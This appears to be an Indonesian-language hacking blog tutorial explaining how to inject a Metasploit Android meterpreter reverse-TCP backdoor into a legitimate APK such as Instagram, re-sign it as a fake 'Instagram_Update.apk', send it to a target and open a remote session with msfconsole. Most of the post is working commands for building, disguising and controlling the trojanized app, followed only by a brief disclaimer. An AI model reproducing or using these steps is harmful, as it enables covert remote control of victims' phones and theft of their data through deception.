Author:SadClown
Kalau untuk mengelabui target user windows dengan membuat backdoor dengan format file tertentu mungkin sudah biasa ya, karena memang sudah banyak module exploit yang digunakan untuk membuat backdoor dengan format file tertentu(.pdf, .doc, .rar). lalu bagaimana jika target exploit kita android, dan bagaimana untuk menyamarkan backdoor tersebut ? oke di bawah ini akan saya berikan contoh cara menyisipkan backdoor kedalam file apk.
Bagi yang mau mencoba bisa download bahannya disini
Extract file tersebut lalu masukkan file apk yang akan di sisipi backdoor ke dalam folder apk-embed jadi satu dengan apk-embed-payload.rb. sebagai contoh disini saya akan menyisipkan backdoor kedalam file apk instagram
Nah untuk memasukkan payload ke dalam file apk tersebut perintahnya seperti ini
ruby apk-embed-payload.rb [target.apk] [msfvenom options]Contoh
ruby apk-embed-payload.rb Instagram.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.100 lport=1337
Tunggu hingga prossesnya selesai, jika berhasil nantinya akan ada file baru yang telah disisipi backdoor dengan nama namafile_backdoored.apk
Selanjutnya adalah melakukan SignApk, tujuannya agar file apk yang telah di sisipi backdoor tersebut bisa di install di semua device android.
Caranya, masukkan file apk hasil backdooring kedalam folder SignApk. lalu lakukan sign dengan perintah dibawah ini
java -jar signapk.jar testkey.x509.pem testkey.pk8 [file_asli.apk] [file_asli_hasilsign.apk]Contoh
java -jar signapk.jar testkey.x509.pem testkey.pk8 Instagram_backdoored.apk Instagram_Update.apk
Nah diatas file hasil sign saya beri nama Instagram_Update.apk dan file siap di kirim ke target. namun sebelumnya buka msfconsole, set seperti di bawah ini
Berikut ini adalah tampilan android target ketika menginstall file apk yang di sisipi backdoor tadi.
Tidak beda dengan aslinya kan
Namun begitu target mebuka aplikasi tersebut kita juga mendapatkan sesi meterpreternya
msfconsole
use exploit/multi/handlerlhost dan lport sesuaikan dengan yang kalian gunakan.
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.100
set lport 1337
exploit
Berikut ini adalah tampilan android target ketika menginstall file apk yang di sisipi backdoor tadi.
Tidak beda dengan aslinya kan
Namun begitu target mebuka aplikasi tersebut kita juga mendapatkan sesi meterpreternya
Bagi yang masih penasaran kalian bisa lihat video di bawah ini
Tutorial ini hanya ntuk pengetahuan semata, jika ada penyalahgunaan dari tutorial ini bukan tanggung jawab dari saya.
Saya harap dengan dibuatnya postingan ini dapat membuat kita agar lebih berhati-hati apabila mendownload aplikasi dari sumber yang tidak terpercaya. Selalu download aplikasi dari website resmi atau dari google play.
Oke, mungkin cukup itu yang bisa saya sampaikan mengenai Cara Menyisipkan Backdoor kedalam File Apk, semoga bermanfaat.
0 Komentar